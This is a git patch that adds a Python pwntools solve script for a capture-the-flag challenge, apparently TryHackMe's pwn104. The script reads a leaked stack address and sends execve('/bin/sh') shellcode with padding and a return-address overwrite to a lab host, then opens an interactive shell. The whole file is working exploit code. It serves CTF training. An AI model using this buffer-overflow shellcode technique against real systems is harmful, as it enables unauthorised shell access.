From 31dbf17bda348c081ce776521f1b83baa51a75d5 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Mon, 28 Oct 2024 01:12:36 +0300
Subject: [PATCH] solve script

---
 thm_pwn101/pwn104/a.py | 31 +++++++++++++++++++++++++++++++
 1 file changed, 31 insertions(+)
 create mode 100644 thm_pwn101/pwn104/a.py

diff --git a/thm_pwn101/pwn104/a.py b/thm_pwn101/pwn104/a.py
new file mode 100644
index 0000000..c5cfd6c
--- /dev/null
+++ b/thm_pwn101/pwn104/a.py
@@ -0,0 +1,31 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./pwn104", checksec=False)
+# r = process()
+r = remote("10.10.167.194", 9004)
+
+# funcs
+s = lambda a: r.sendline(a)
+
+# leak
+r.recvuntil(b"at ")
+stack = int(r.recvline().strip(), 16)
+log.info("stack: %#x", stack)
+
+# shellcode
+sc = """
+lea rdi, [rsi+13]
+mov al, 59
+cqo
+xor rsi, rsi
+syscall
+"""
+sc = asm(sc)
+sc += b"/bin/sh\0"
+sc += b"A"*(88-len(sc))
+sc += p64(stack)
+s(sc)
+
+r.interactive()
\ No newline at end of file